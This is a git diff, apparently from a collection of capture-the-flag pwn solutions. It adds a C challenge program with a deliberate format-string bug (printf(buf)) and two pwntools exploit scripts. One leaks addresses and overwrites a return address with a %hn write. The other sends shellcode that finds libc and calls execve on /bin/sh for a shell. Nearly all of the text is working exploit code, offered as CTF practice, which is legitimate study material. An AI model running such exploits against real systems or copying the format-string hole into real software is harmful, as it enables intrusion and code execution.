+# leak
+s(b"%20$p.%21$p")
+r.recvuntil(b": ")
+leaks = r.recvlineS().split(".")
+stack_addr = int(leaks[0], 16) - 0x8
+log.info("stack_addr: %#x", stack_addr)
+print_flag = int(leaks[1], 16) - 0x1aa
+log.info("print_flag: %#x", print_flag)
+write_bytes = int(str(hex(print_flag))[-4:], 16)
+fs = f"%{write_bytes}x%8$hnAAAA".encode()
+
+# write
+ss(fs+p64(stack_addr))
+ss(b"exit")
+
+r.interactive()

random_challs/valley/source.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void print_flag() {
+    char buf[32];
+    FILE *file = fopen("/home/valley/flag.txt", "r");
+
+    if (file == NULL) {
+      perror("Failed to open flag file");
+      exit(EXIT_FAILURE);
+    }
+    
+    fgets(buf, sizeof(buf), file);
+    printf("Congrats! Here is your flag: %s", buf);
+    fclose(file);
+    exit(EXIT_SUCCESS);
+}
+
+void echo_valley() {
+    printf("Welcome to the Echo Valley, Try Shouting: \n");
+
+    char buf[100];
+
+    while(1)
+    {
+        fflush(stdout);
+        if (fgets(buf, sizeof(buf), stdin) == NULL) {
+          printf("\nEOF detected. Exiting...\n");
+          exit(0);
+        }
+
+        if (strcmp(buf, "exit\n") == 0) {
+            printf("The Valley Disappears\n");
+            break;
+        }
+
+        printf("You heard in the distance: ");
+        printf(buf);
+        fflush(stdout);
+    }
+    fflush(stdout);
+}
+
+int main()
+{
+    echo_valley();
+    return 0;
+}

random_challs/voidexec/a.py

@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./voidexec", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = f"""
+xor rsi, rsi
+xor rdx, rdx
+mov r9, [rsp+32]
+sub r9, {libc.sym.__libc_start_call_main+128}
+mov rdi, r9
+add rdi, {next(libc.search(b"/bin/sh\0"))}
+mov r15, r9
+add r15, {libc.sym.execve}
+call r15
+"""
+sc = asm(sc)
+s(sc)
+
+r.interactive()